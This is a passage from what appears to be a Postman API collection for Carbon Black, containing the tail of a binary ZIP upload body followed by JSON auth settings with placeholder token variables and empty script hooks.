files/windowsapps/microsoft.yourphone_1.21022.160.0_x64__8wekyb3d8bbwe/yourphoneappproxy/tk-tm/yourphoneappproxy.core.resources.dllQ\u001a$\u0000\u0017\u0000 \u0000/�\u000e(+JƐ8��(���%��\u001dB[��\u000f���5YGd�\n\u0000 \u0000\u0000\u0000\u0000\u0000\u0001\u0000\u0018\u0000\u0000>չ<'�\u0001\u0000>չ<'�\u0001\u0000�A�<'�\u0001PK\u0005\u0006\u0000\u0000\u0000\u0000\u0001\u0000\u0001\u0000\u0005\u0001\u0000\u0000�\u0005\u0000\u0000\u0000\u0000"}],"_postman_id":"76ff4619-2df3-4bb1-9ff2-3ea5cc39fd03"}],"id":"ef6af4a7-d963-40ee-b1fb-7f8e700c976a","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cbp_token}}"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"2af2006f-ca6a-4726-bae1-bde27c9bcefa"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"1ddd0ed8-ce63-42d9-bef6-e61a62a09a66"}}],"_postman_id":"ef6af4a7-d963-40ee-b1fb-7f8e700c976a","description":""}],"id":"54fe7614-bd11-434f-843e-9c2ae381ea73","_postman_id":"54fe7614-bd11-434f-843e-9c2ae381ea73","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"x-auth-token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"198ade9c-4ba5-4b4f-bcc0-107c0f4806a9","id":"198ade9c-4ba5-4b4f-bcc0-107c0f4806a9","name":"Carbon Black","type":"collection"}}}],"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"x-auth-token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]}},"event":[{"listen":"prerequest","script":{"id":"d91f7896-4997-4cd5-97d0-248cccdcecb4","type":"text/javascript","exec":[""]}},{"listen":"test","script":{"id":"3e7782e1-0291-4898-88f1-22450e41a910","type":"text/javascript","exec":[""]}}]}